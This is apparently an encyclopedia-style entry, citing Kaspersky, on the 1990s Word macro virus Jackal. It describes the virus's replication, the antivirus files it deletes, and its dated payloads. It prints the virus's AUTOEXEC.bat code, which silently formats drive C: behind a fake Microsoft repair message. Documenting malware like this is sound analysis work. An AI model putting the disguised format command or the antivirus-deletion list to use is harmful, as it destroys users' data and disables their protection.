The virus contains a single module with 14 macros (AutoOpen, FileSaveAs, KillAV, Format, ToolsMacro, ViewVBCode, FileTemplates, Organizer, EditFind, HelpAbout, ToolsCustomize, ToolsOptions, Jackal and Ultras). The virus replicates itself to documents that are opened, and documents that are saved henceforth.
In order to minimise the threat of deletion, the virus will delete executables, dlls, and other assets for popular (at the time) antimalware/antivirus software.
C:\Program Files\AntiViral Toolkit\ProAvp32.exe C:\Program Files\AntiViral Toolkit Pro\*.avc C:\Program Files\Command Software\F-PROT95\*.dll C:\Program Files\Command Software\F-PROT95\*.exe C:\Program Files\McAfeeVirusScan95\Scan.dat C:\Program Files\McAfeeVirusScan\Scan.dat C:\Program Files\Norton AntiVirus\Viruscan.dat C:\Program Files\Symantec\Symevnt.386 C:\Program Files\FindVirus\Findviru.drv C:\Program Files\CheyenneAntiVirus\*.dll C:\Program Files\Cheyenne\Common\Cshell.dll C:\PC-Cillin\95Lpt$vpn.* C:\PC-Cillin\95Scan32.dll C:\PC-Cillin\97Lpt$vpn.* C:\PC-Cillin\97Scan32.dll C:\eSafeProtect\*.dll C:\f-macrof-macro.exe C:\TBAVW95\Tbscan.sig C:\Tbavw95\Tb*.* C:\VS95\*.dll
On the first day of every month, the virus will add a password to all existing Microsoft Word documents ("JACKAL"), with a different password being set on the 27th day of any month. ("ULTRAS")
On the 5th, 9th, 17th and 25th day of each month, it will show a message to the user, simply saying "Error, is necessary will update files". It will later append its own code to AUTOEXEC.bat, such that the user's C drive is formatted upon next startup, masquerading as a system update or repair. [?]
The appended code reads as follows:
@ECHO OFF CLS ECHO Microsoft Corp. 1983-1997 All rights reserved ECHO Goes preparation to renovation of your system files ECHO Please wait this can occupy several minutes FORMAT C: /U /C /S /AUTOTEST > NUL ECHO. ECHO. ECHO. ECHO Error at renovations of files
On the 15th and 30th day of each month, all files within the Windows directory will be deleted, rendering the machine unbootable until formatted.
- Kaspersky Threats, Virus.MSWord.Jackal